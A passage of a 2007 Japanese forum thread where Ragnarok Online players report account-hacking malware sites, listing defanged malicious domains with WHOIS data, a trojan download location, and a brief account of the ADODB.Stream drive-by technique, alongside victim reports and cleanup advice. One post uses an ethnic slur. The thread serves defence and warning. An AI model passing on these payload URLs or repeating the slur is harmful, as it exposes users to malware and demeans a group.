422 ：(^ー^*)ノ〜さん ： 2007/04/05(木) 20:55 ID:FgdXryfV0

【　 　 　 気付いた日時　 　 　 　 　 】 4/5
【不審なアドレスのクリックの有無　】 不明
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【 　 　ツールの使用の有無　 　 　 】 No
【　 ネットカフェの利用の有無　 　　】 No
【　 　　 OS　 　 】 WinXP SP2
【使用ブラウザ 】IE6 Sleipnir
【WindowsUpdateの有無】 4/4
【　アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ5.0
【その他のSecurty対策 】 ルータ経由
【 ウイルススキャン結果】 最新状態に更新したカスペルスキーで完全スキャンしても何も出ず。
【スレログやテンプレを読んだか】 No
【説明】
それまで使っていたウィルスバスターからカスペルスキーオンラインへ昨日変えたのですが
カスペルスキーに変えてROを起動して遊んでいる途中or起動時にウィルスと検知します。
ログはこんな感じでした。
検知しました: リスクウェア Private data and passwords access プロセスを実行します。: C:\Documents and Settings\○○○○\Local Settings\Temp\RFS884C.tmp\rfwipeout.exe
検知しました: リスクウェア Hidden object プロセスを実行します。: D:\Ragexe.exe

と、ここまで書いて思ったのですが、ロボフォームがROのパス入力に反応してるだけで無害なのかな？
検知した二つの物は信頼ゾーンへ入れてもいいのだろうか。。。

423 ：(^ー^*)ノ〜さん age ： 2007/04/05(木) 21:07 ID:p9ZWB8iq0

間違って >>294 を開いてしまいました。

ウイルスソフト SOURCENEXTstyleでウイルスチャックをして見つからず。
カスペルキーでチャックをしたけど見つからなかったけど大丈夫なのですか？

424 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 21:14 ID:hiZIaLh30

リネージュ資料室によると毎度おなじみ福建人により以下ドメインが登録された模様。
また”*jp.com”ドメインと登録郵便番号が四川省成都で住所が福建省竜岩。

www■ywdgigkb-jp■com

Domain Name ..................... ywdgigkb-jp■com

Registrant Name ................. zhiqiqnag lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian
Registrant City ................. longyan
Registrant Province/State ....... fujian longyan
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

425 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 21:16 ID:kB6EiKu60

>>423
安心したいならOS再インストしてら

426 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 22:23 ID:eurhkPgE0

>>423
■で置換してあるのに開くって、
先頭のwwwまでを開いた、とかいわないよね？

それなら害はないので、そのチャックで十分かもしれん。

427 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 00:18 ID:BdPTKrVt0

別件で同じURLを開いたとか

428 ： ◆sp4Sh9QXGI sage ： 2007/04/06(金) 11:39 ID:ycjHgPnv0

中の人です。
今日の更新：
　・ywdgigkb-jp■comを追加しました。
　・危険URLの貼り付けを行うIPに
　　219.128.0.0/12
　　を追加しました。

429 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 12:35 ID:PICwuj3G0

こんなドメインを発見、登録情報から毎度おなじみ福建人のものと断定。

www■gamesroro■com

Domain Name ..................... gamesroro■com

Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

430 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 13:19 ID:w7CluOoW0

変な韓国IPがネット接続を妨害してきて困る。

431 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 14:38 ID:wB4WTNiB0

　　　　/　　　 ||　　　　:ヽ
　　 ┌|（⌒ヽ :||　..:⌒:　|┐　　 ／￣￣￣￣￣￣￣
　　　|::|::ヽ.__:）:||（___ノ　::|::|　　│
　　　 |:|: ..　　 :||　　　 .. |:|　　│
　　　　:|: ..　　 ||　　　 ..||　＜　　 ジュワ！
　　　　 :＼　［_￣］　/::|　　　│
::　　　　　|＼|_|_|_|_／:::|　 　　＼＿＿＿＿＿＿＿＿
　　 ＿＿|　|　　　/ /　:|＿＿＿

432 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 16:30 ID:u97Dhrq60

かなり時間たつけど >423 の者です。
4/5日にブログに書かれており、そのとき、気をつけていなく、開いてしまった。
＠から気づき急いでここを見て、PCのウイルスソウトとカスペルスキーを使って検知したところ
何も検知できなかったわけです。説明不足でごめんなさいorz
開いた先だけど、ブロックしてあったのか、エラーが出て表示されました。

433 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 17:26 ID:zxRsMLJ60

>>432
テンプレ>>4を使って報告してください。
テンプレには報告すべき重要な項目が含まれているのです。
それを無視して報告しても、アドバイスなどできるはずもありません。

434 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 17:42 ID:6t4ZI22O0

遂に登場というか垢ハックアドレスコンボが降臨

RMCの雑談掲示板に以下の投稿を発見
-----
↑ No.234047 [ 引用付き返信 ] [ 返信 ] [ 終了 ] [ 仮削除 ] [ 完全削除 ] [ 管理 ]
雑談 - ソウルリンカー情報交換スレ
New 桜樹 さん 2007/04/06 (金) 17:25 UID：[ 41285@EVY8lPjX ]


ソウルリンカー、およびリンカー志望テコンキッドの情報交換を目的としたスレッドです。
積極的な情報収集、意見交換で盛り上げて行きましょう。

■お約束
sage進行です。メール欄にsageと入力(半角小文字)

※質問相談をする前にテンプレwiki、現行スレを検索してみましょう
※狩場報告、質問相談は情報公開用テンプレを参考に他者が参照しやすいように
※愚痴煽り叩きの類はカアヒとカウプを駆使して華麗にスルー。エスクしないように

■前スレッド
ソウルリンカー情報交換スレ LINK-10
http://www■game-mmobbs■com/bbs/

■ソウルリンカーwiki
http://www■wikiwiKi-game■com/8651262/

■関連サイト
【ステアップ板】 http://nike-net■com/linker_wiki/gms/list.php
【リンカー計算機】 http://www■ragnarok-sara■com/bbs/
【エスマ確殺計算機】http://www■slower-qth■com/8651262/
【ROratorio(RO計算機)】 http://roratorio■2-d■jp/ro/
【わむてるらぶ(スキルシミュレータ)】 http://www■aurasoul-visjp■com/bbs/
-----

435 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 17:59 ID:XmHkJ1Mz0

ほんと色々やってくれるなー

436 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 18:01 ID:XDRcw2wa0

■Kasperskyのセキュリティ製品に脆弱性、最新版にアップデートを
http://internet.watch.impress.co.jp/cda/news/2007/04/06/15340.html

　　　　　　　　　ナ ゝ　　　ナ ゝ　/　 　 十＿"　 　 ー;=‐　　　　　　　　　|! |!
　　　　　　　　　　cト　　　　cト　/＾､_ﾉ　 | ､.__　つ　 （.__ 　 ￣￣￣￣ 　 ・ ・

　　 　 ,　'´￣￣｀ ｰ-､　　　　　　　　　　　　 -‐ '´￣￣｀ヽ､
　　 ／　　 〃" ｀ヽ､　＼　　　　　　　 　 ／　／" ｀ヽ ヽ　　＼　 　 　 -‐ '´￣￣｀ヽ､
　 /　/　 ﾊ/　　　u　＼ﾊﾍ　　　　 　 　 //, '/　u 　　 ヽﾊ 　､　ヽ　／　／" ｀ヽ ヽ　　＼
　 |i │ ｌ |ﾘ＼　　　 ／}_}ハ.　　　　 　 〃 {_{＼　　　 ／ﾘ| ｌ │ i| //, '/　　　u　ヽﾊ 　､　ヽ
　 |i　|　从 ●　u 　 ●ｌ小N　　　　　　ﾚ!小ｌ●　　　 ● 从　|、i|〃 {_{＼ u 　　／ﾘ| ｌ │ i|
　 |i （|　⊂⊃ ､_,､_,　⊂lｉ|ノ　　 　 　 　 ヽ|l⊃　､_,､_,　⊂⊃　|ﾉ | ﾚ!小ｌ●　　　 ● 从　|、i|
　 | i⌒ヽ j　　（_.ノ 　　ﾉi|__／⌒) /⌒ヽ__|ﾍ u　 ゝ._）　 　j /⌒i ! ヽ|l⊃　､_,､_,　⊂⊃　|ﾉ│
　 | ヽ 　ヽx＞､ __,　イｌ　|::::ヽ／.　＼ /:::::|　l＞,､ __,　イァ/ ./⌒ヽ__|ﾍ　　 ゝ._）　 　j /⌒i !
　 |　∧__,ﾍ}::ﾍ三|:::::/ｌ|　|',:::::ﾊ　　　./:::::/|　|　ヾ:::|三/::{ﾍ､_..＼ /:::::|　l＞,､ __,　イァ/　 /│
　 |　ヾ_:::ッﾘ :::∨:／　|　| >'''´　 　 .｀ヽ< |　|　　ヾ∨:::/ヾ:::彡' /:::::/|　|　ヾ:::|三/::{ﾍ､__∧ |

437 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 18:26 ID:Eil8bnAK0

>>434
どうすんだこんなの・・・

438 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 18:30 ID:JWp0piYH0

文章の内容は理解せず、URLの載った文章を再利用しているだけ
ってこと。

439 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 20:01 ID:gejv3Ux50

絵のサイト（一部ROの絵を含む）を運営してる者なんですが、
最近垢ハックウイルスのアドレスが貼られていたので注意ということで。
http://www■linkcetou■com/

まさか絵のサイトにまでやってくるとは思いもよらなかったよ…('A`)

440 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 20:21 ID:KutWs7G50

この問題マジでどうにかしないとRO終わるぞ

441 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:03 ID:Fuw6iAvf0

ROに限ったことじゃない
ネットゲーム全部が終わる

442 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:04 ID:bHc8OvZf0

>>434
すげぇ…。
しかもこれが彼らの持ちドメインのほんの一部だってのがすげぇ…。

443 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:05 ID:wuJO1F000

運営黙りだもんな、告知の一つもださないし
他のゲームはどうだかわからないけどもなんらかの注意呼びかけくらいしたらって思う
BOTも増える一方だし悪化の一途だなぁ

λ...　＜LiveRo行ってくる…

444 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:06 ID:w7CluOoW0

警察：管理会社が動けば捜査する。
　　　　　　↓　　↑
管理会社：警察が動けば事態を収拾する。
　　　　　│└→─┘
　　　　　↓（ここまでたらい回し）
　　　垢ハック引退加速。
　　　　　　↓
警察と協力して対策をする予定です（数ヵ月後の公開質問）
　　　　　　↓
　　RO2の垢ハックが実装される

445 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:15 ID:jLB/OHvl0

もう終わってる・・・って煽りは置いといて
警察に駆け込む人が増えたら会社に注意とか警告とか行かないものなのかね

446 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 21:19 ID:bHc8OvZf0

>>434
222.77.185.84
slower-qth 8651262
wikiwiki-game 8651262

222.77.185.88
game-mmobbs bbs
ragnarok-sara bbs
aurasoul-visjp bbs

実質2つ。
他2つはたぶんダミーとして混ぜた普通のファンサイト。

447 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 22:12 ID:qCv7Nf8W0

実際大半のネトゲがターゲットされているっぽい。
どのゲームでも今後常時垢ハックの脅威が付きまとう事になる。
まぁメールやらMixiやらのパスも盗まれて来てるんで、何もかも危ないとは言えるが、
ネトゲに限ってはRMTが無くならない限りは今後延々とこの攻撃は来るだろう。
悲しいがネットゲーもお手軽に遊べるものではなくなって来た訳だ。辛いな･･･

448 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 23:10 ID:58qEalhu0

ゲームに限った事ではないだろ
リアル・オンライン問わず支那畜滅ぼさん限りどんどんヤバくなってきてる

449 ：(^ー^*)ノ〜さん sage ： 2007/04/06(金) 23:12 ID:GLdDpdyK0

法律が追いついてないんだよな
もはや国際犯罪なのに・・・

450 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 03:12 ID:bll/Z8/d0

同じ手口を使って、ネットバンキングのＩＤとパスを抜くこともできるはずで、
そっちの方が稼ぎが多いだろうに、実際にはネトゲのアカハックの件数が圧倒的に多いんだよね。
（泣き寝入りしてる件数は多分ネトゲの方が圧倒的に多いと思うから、実際は下表以上の差があると思う）

●不正アクセス行為後の行為の内訳(平成17年,平成18年)
H17 H18 不正アクセス行為後の行為
--- --- ---------------------------------------
356 593 インターネット・オークションの不正操作
140 257 オンラインゲームの不正操作
005 039 インターネットバンキングの不正送金
031 032 ホームページの改ざん・消去

銀行の方はＩＤカードやワンタイムパスワードなどを導入しているところもあって、
ネトゲのそれよりセキュリティレベルは高いとはいえ、この差はいったい・・・

451 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 05:45 ID:cvvwINAW0

レベルが高いどころかネトゲなんかとは次元が違う

452 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 06:27 ID:DbRDg0sx0

ユーザの数もけっこう違うんじゃ
俺怖くてネットバンクなんて使えねえ

453 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 07:05 ID:d99PAcor0

法の関係などで捕まる可能性がネットバンク>>>>>>>>>>>>>>>>>ネトゲなんじゃないかね。
中華が偽クレジットで360パック買いまくり事件の時も実際の金を引き出すより、
ネトゲのアイテムを換金した方が足がつかないからとか言われてたし。

454 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 07:06 ID:d99PAcor0

すまんセキュリティ対策スレ向きだったかもしれん。

455 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 08:21 ID:F8o15U1e0

http://www■gangnu■com/
http://www■cetname■com/

報告あるかちょっと判らなかったんだけど
新たな書き込みを発見
どちらもlovetw行きのようです

456 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 09:42 ID:RMFUntYQ0

多分、全部既出ですが、某ツール系掲示板に貼られたもの。

285 優しい悲劇 New! 07/04/06 23:06 ID:5GYsMbxA
http://www■geocitylinks■com/links/

860 No Name New! 07/04/07 05:49 ID:3qihWBmE
Ro 装備. 血盟すれっど
陽光RO会社 URL:　http://www■aaa-livedoor■net/ro-navi/
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
＞記事全文まとめ。
http://www■ro-bot■net/10657/
＞雑誌記事の取り込み画像
http://www■gemnnammobbs■com

457 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 11:45 ID:rAfTz0bw0

連中は本当に節操ない、紀藤弁護士サイトの掲示板にもlinkcetouが貼ってあった。
検索でbbs、blogがヒットすれば何処でもいい感じだな。
ロボット避けしてるところには来ないみたいだから、
検索回避できるサービスに引っ越すのも一つの手だ。

458 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 12:22 ID:KB2IA8Oo0

天安門って単語を紛れさせとくってのは実際どうなの？
半分ネタで言われてる気もするけど、意外と効果ある気もしなくはない

459 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 12:35 ID:RMFUntYQ0

>>458
雑談スレへ行けよ。気休めにしかならない。無駄。以上。

460 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 12:38 ID:KB2IA8Oo0

はいはい雑談雑談＾＾；；；

461 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 13:23 ID:rAfTz0bw0

アカハクドメインでサーチしたらまた発見

ドメイン情報や記事日付などから見て改竄された可能性極大。

掲示板で見つけたもの、TOPにリンクがないので放置しているものを改竄したものと思われる
ttp://www■omakase-net■com/minamiblog/index■html

TOPにもIFRAMEが仕込まれている。
ttp://www■omakase-net■com

462 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 14:33 ID:lU56R3n90

ヤフー検索から踏んでしまったのだがこれって怪しい？
内容が真っ白だった

www.ip-checker.net

463 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 14:53 ID:wNItL2ZE0

>>462
※このスレは『勇気が無くて見れないサイト解説スレ』ではありません

当方の環境ではページが表示された。
内容は自分のIPアドレスを確認(表示)するだけのサイト。
特に不審点は見あたらない。

あと「真っ白だから怪しい」とか、ページの内容で
危険の有無を判断しない方が良いと思います。

464 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 14:55 ID:Wi4CabO50

テンプレぐらい読んでから来い

465 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 14:59 ID:89misOZw0

>>463-464
RMT業者が被害者を装って書き込んだ釣りだと思うけどな
中華だけでなく日本人業者もMMOBBSを見てる

466 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 17:27 ID:UVLSaEXR0

ついさっきまで普通にログインできてたキャラパスが
鯖キャンで落ちて以降、入力しても違うと弾かれるんだが・・・
5キャラ全て同じ長いパスで4キャラは全部INできるんだが
1つだけ弾かれる。
オンラインスキャンしてもウィルス出なかったし、何か不安だ。
今はコールセンターの返答待ちだが、急にこうなるなんてマジ心配だ。

467 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 17:49 ID:go3ipWXA0

心配するなら全キャラ別々のパスに変えておけ

468 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 18:42 ID:d99PAcor0

いや、もし外部から何かで抜かれてるんだったら変えたらまずいだろう。

469 ：(^ー^*)ノ〜さん sage ： 2007/04/07(土) 18:55 ID:DbRDg0sx0

>>466
とりあえずカスペあたりでチェックしたら？

470 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/04/08(日) 02:03 ID:RQo21nzW0

www■omakase-net■comほかのドメインを追加しました。
↑は一応PG2のリストにも登録してあります、ご確認ください。
それでは…おやすみなさい

471 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 07:48 ID:RcbO+aZW0

以下R.O.M776のフリー掲示板に貼られていたものです。
この書き込みをした段階では削除されていないので踏まないように注意。

-----------------------------------------------
■31638 / inTopicNo.1) 　big-boob
□投稿者/ Nicole ＠ -(2007/04/07(Sat) 21:04:52) [ID:CVtBuCxu]
ttp://tedstate■info/big-boob

話題の種別:[その他雑談]　

Sentimental and nostalgic. Great.+
-----------------------------------------------

メール欄が
rom776tesy@tesy■tesy
ってなってたのだけど…
こんなところまでそれっぽく見せようと偽装しているのかなと。
RO起動中にこの書き込みを見たのですが
踏んでいなくても、本当に踏んでいないか怖くなって
いまカスペルさんオンラインチェック。
まあ…踏んでいたらもうアウトなんですけどね。

それにしてもこのオンラインチェック、
当方のPCはROの起動スペックギリギリで
ウイルスバスターも裏で動いているのにもかかわらず
なんだか軽めな好印象。
プロ北Dで篭りながらでも凄い処理落ちせずにBB狩りできていたり。

472 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 09:42 ID:EUtlr+gb0

>>471
アカハックとは関係なさそうだが、
怪しげな海外のアダルトサイト？に飛ばされる模様。

tedstate■info
Registrant Name:Igor
Registrant Organization:N/A
Registrant City:Tallinn
Registrant State/Province:0
Registrant Postal Code:13621
Registrant Country:CN

↑の飛び先が↓
www■giftsee■com
Name: igor
Company: N/A
City: tallinn
State: Harjumsa
Country: EE


tallinn = タリン(エストニアの首都)
EE = エストニア
CN = 中国

473 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 09:56 ID:6DD8wVlc0

最近.comのアドレスには相当警戒して飛ぶようにしてる
怪しいと思ったらaguse活用するクセつけたほうがいいね

474 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 11:02 ID:Azuo1E0s0

ネトゲにかかわらず、最近の中華は何でも有りだな。
酷すぎるわ・・・

475 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 11:36 ID:NPso5GFD0

よくわからないんだけど踏んだだけでアウトなのかな？
DL窓出てDLしたらアウトなのか、URL踏んだだけでアウトなのかわからないんだが

476 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 11:39 ID:6DD8wVlc0

白い画面見た時点でアウトなんじゃ

477 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 12:01 ID:xl0iZ6GXO

踏んだだけでアウトってのが普通だろう

478 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 12:03 ID:NPso5GFD0

俺少し前に踏んでPC詳しいやつに聞いたんだが
開いて窓が出てそれをDLしたらアウトって言われたんだ
それから5ヶ月経って平気だけど、今は踏むだけでアウトなの？

479 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 12:10 ID:QEPwDwEC0

今はOSやアプリケーションの脆弱性を利用して、
ユーザーの確認なしに勝手にプログラムをダウンロード→実行させるという
手口の物がほとんどなので、「開いて窓が」でない方が普通。
踏んだだけでアウトと思った方が良い。

480 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 12:12 ID:6U4I+m6N0

そんなもんモノによるがな

未知の脆弱性を突くやつなら踏むだけでアウトかもしれんし
しょぼい手法なら踏んでも大丈夫かもしれんかもしれん

本当に詳しい奴だったんならソース見たりして動作把握してたんじゃねーの

481 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 12:13 ID:6qXeejkL0

>PC詳しいやつに聞いたんだが開いて窓が出てそれをDLしたらアウトって言われたんだ

そいつは1000%知ったかぶりなんちゃってヘビーユーザー

482 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:06 ID:NPso5GFD0

やっぱり心配になってきた・・

【　　アドレス 　 】 http://www■cityhokkai■com/links/
【気付いた日時】 3月8日
【　 　　 OS　 　 】 WinXP　HomeEdition
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 3月28日
【　アンチウイルスソフト 】 avest
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 何も見つからず
【スレログやテンプレを読んだか】 Yes
【説明】
友人のブログに、別の友人の名前を騙った書き込みで踏んでしまいました

483 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:11 ID:IF5epI9H0

>【スレログやテンプレを読んだか】 Yes
>【説明】
>友人のブログに、別の友人の名前を騙った書き込みで踏んでしまいました

テンプレの対処法のうち、なにを行なったか。
わからないところがあるか。（また、それはどこか）

484 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:20 ID:NPso5GFD0

感染の可能性のあるPCはケーブルを外し
別のPCからパスの変更は行いました

485 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:25 ID:IF5epI9H0

>>484
あとは、踏んだＰＣだけだね。

踏んだ時に取った行動は？どんな画面で、どんな操作を行なったか。
踏んだ可能性が高いなら、確認と除去作業が必要。

ブロックできたのか、踏む前だったのかわからない場合で、自分の使っているセキュリティソフトで
反応しない場合、複数のセキュリティソフトで再度スキャンすることが望ましい。
各社のオンラインスキャンを試みること。

486 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:30 ID:IF5epI9H0

>>482のアドレスは、現在ページが見つかりません。hostsでブロックしてるせいだな。
このページのものが、何という名前で引っ掛かる代物か確認できない。orz

487 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:33 ID:NPso5GFD0

白い画面のサイトに繋がり、ページは即閉じてavestでスキャンかけました
結果は何も見つからず不安だったので
カスペルスキーオンライン ウイルス＆スパイウェアスキャナも試みましたが
何も見つかりませんでした

488 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 13:47 ID:IF5epI9H0

最善の解決方法
現時点（もしくは踏んだ時点）で置かれているのが○○で、△△というソフトなら検知できる。
△△で発見できなかったので、感染していないと思われる。（現時点で、誰かがモノを確認しないとだめ）
時間帯などによって、差し替えられる可能性があり、踏んだ時点と、確認した時点に時間差があると
信用できない場合が有る。

現在、モノの確認報告がないので、大丈夫（に近い）と保証することはできない。

スキャン結果を信用して、感染（トロイダウンロード）前に、切断したと判断するか、
検知されないだけで、感染しているためＯＳの入れなおしから行なう必要があるか
「自己責任」で判断して欲しい。他人の立場では判断できない。

不安の解消が目的であれば、バックアップをとって、ＯＳの入れなおしを。
ＰＣのゴミファイルや不用なレジストリなどもクリアされた状態に戻るので、ただの時間の無駄にはならないと思う。

もしくは、別HDDなどに環境を構築してそちらから起動し、そこの別種のセキュリティソフトを導入。
検知できるソフトが出てくるまで、セキュリティソフトをとっかえひっかえ入れ替えて見ることもできる。

489 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 14:14 ID:QVxh66o10

未然に防いだ＆OSクリーンインストール済みの事例だけど
かなり特殊な方だと思うので晒してみる
（＋日時的にアニメーションカーソルの微弱性をついたものと思う）

【　 　 　 気付いた日時　 　 　 　 　 】3/30
【不審なアドレスのクリックの有無　】 履歴を見た限り無かった
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【 　 　ツールの使用の有無　 　 　 】No
【　 　　 OS　 　 】 (SP等まで書く)
【使用ブラウザ 】 FileFox 2.0.3
【WindowsUpdateの有無】 3/30
【　アンチウイルスソフト 】 NortonInternetSecurity200)
【その他のSecurty対策 】 Spybot S&D、PeerGuardian2
【 ウイルススキャン結果】 どちらでも検出されず
【スレログやテンプレを読んだか】 Yes
【説明】其の日はPukiwikiのプラグインやCSS・Web関連のサイトを回っていたので
どこで踏んだかは実は判っていない。
3/30未明にROを起動するとPG2が遮断警告を出すので何事かと思ったら
lovetwへのアクセスをブロックしていた。

一応クリーンインストール前に知り合いに装備とお金を預けOS再インストール
→再インストール後Pass全部変えた

490 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 14:14 ID:QVxh66o10

OSが抜けてた

Windows XP SP2

491 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 14:18 ID:QVxh66o10

よく見たらOS以外もぼろぼろなので訂正を

ブラウザ FireFox 2.0.3
アンチウイルスソフト→NortonInternetSecurity2007

そそっかしすぎる・・・ orz

492 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 14:38 ID:NPso5GFD0

色々教えて頂きありがとうございます
念のためも1度スキャンして、それでも不安だったら再インストールしてみます
もしかしたらまた来ます…；

493 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 15:51 ID:YXWBfEH/0

スパエウェア、ウイルスどれも感染０なら安心していいんだろ？
5ヶ月ぶりに一ヶ月やるんだがいきなりハッキングされたら飽きれるがよｗｗｗｗｗ
とりあえずチェックして大丈夫だと判断したからログインs低見る

494 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 15:56 ID:6DD8wVlc0

お前の文章がハッキングされてる
すぐに頭を再インストールするんだ

495 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 16:03 ID:IF5epI9H0

>>493
そういった一般的相談はLiveROのスレへどうぞ。

>スパエウェア、ウイルスどれも感染０なら安心していいんだろ？
スパエではなく、スパイウエア。

自分が検出に使ったソフトのパターンに存在しない新種は見付けられない。
だから、100&%安全という保証はできない。自己責任で好きにしな。

496 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 16:38 ID:rbiwzu/z0

騎士スレで質問しても返答がなかったので質問。
騎士Wikiの参考データのセット装備のところをクリックしたら
真っ白なページに飛びました。
左のメニューは表示されたまま　右側が真っ白。
編集ページで確認してみたら内容はなし。
これは、ページ内容が作成されていないだけで、垢ハックとかは関係なしですか？
それとも真っ白ページを装ったウィルスなどもあるのでしょうか？

497 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 16:43 ID:MNB5IRqA0

そんなんしらねーよ不安なら2.3社ウイルススキャンでもしてこいよ

498 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 16:56 ID:IIwsoYJP0

ページが作りかけなだけ。
誰も作る気がないのだろう。

499 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 17:34 ID:E9QlnQ8A0

>>486
>>482のはカスペルスキーのファイルスキャナで
PSW.Win32.Maran.cjと判断されるトロイを取り込んでいる。
トロイの置き場所は www■kuronowish■net/links/server■exe で
環境変数TMP(通常はc:\windows\TEMP)の場所に保存実行するお馴染みの方法。
保存時のファイル名はL_ky60.comだが
実行後にこのファイルを消去して証拠隠滅をするかなどは不明。

500 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 17:49 ID:9+UiDFV10

>>496
あんた、wikiってしってっか？

501 ：(^ー^*)ノ〜さん sage ： 2007/04/08(日) 22:52 ID:AdN7MDv/0

>>478
ある程度わかってる人は踏んでもたいした被害ないようにしてるけど
よくわかんない人の場合は踏んだだけでアウトと考えていいよ。

>>493
安心してよくないよ。
新型や亜種がどんどん生まれてるから検知できてないだけって可能性も充分ありえる。

502 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 01:47 ID:nn2CJp2u0

>>478
例えば、VBScriptでActiveXコントロール(Adodb.Streamなど)を生成して、
ファイルをダウンロードする手法は、多くのアカハックサイト(>>482もまさにそれ)で使われてるが、
脆弱性がある状態だと、何の確認ダイアログも出ず、勝手にファイルがＤＬされ実行される。

ただし ttp://support.microsoft.com/kb/870669/ja のページに解説されている脆弱性を
塞いでおけば感染しない(Adodb.Streamの生成で失敗する)ことはうちのＰＣでは確認した(※)
(２年以上前の脆弱性だし、Windows Updateをしていれば、この脆弱性は勝手に塞がれるので手動でやる必要はない)

※あくまでもうちの環境で大丈夫だったというだけで、人様の環境でどうなるかは不明。

503 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 07:45 ID:CPWs0wlQ0

wikiはウィルスな山なんだぜ
そんなところのリンク先なんて踏んじゃだめだよ

というかwiki自体みるな

504 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 08:23 ID:DvDjRiVl0

>>503
カエレ。その持論は雑談スレで一人で語っててくれ。

505 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 10:56 ID:stkHKIS60

インターネットはウィルスな山なんだぜ
そんなところにネット接続したらだめだよ

というかPCを窓から投げ捨てろ

506 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 11:26 ID:DvDjRiVl0

spamと垢ハック混在と思われます。
久しぶりに覗いたrosvのBBSから。（アドレスのない行のみ引用）

6546:の雪う影 > の雪う影ro blog http://bqdr■blog98■fc2■com/ (2007/04/09 04:34:50)
6528:トトメス > ラグナロクの攻城戦ですよ(´-_-`) http://www■omakase-net■com/minamiblog/index■html (2007/04/07 23:01:08)
6508:相田由真 > http://www■gsisdokf■net/online/ (2007/04/05 15:13:40)
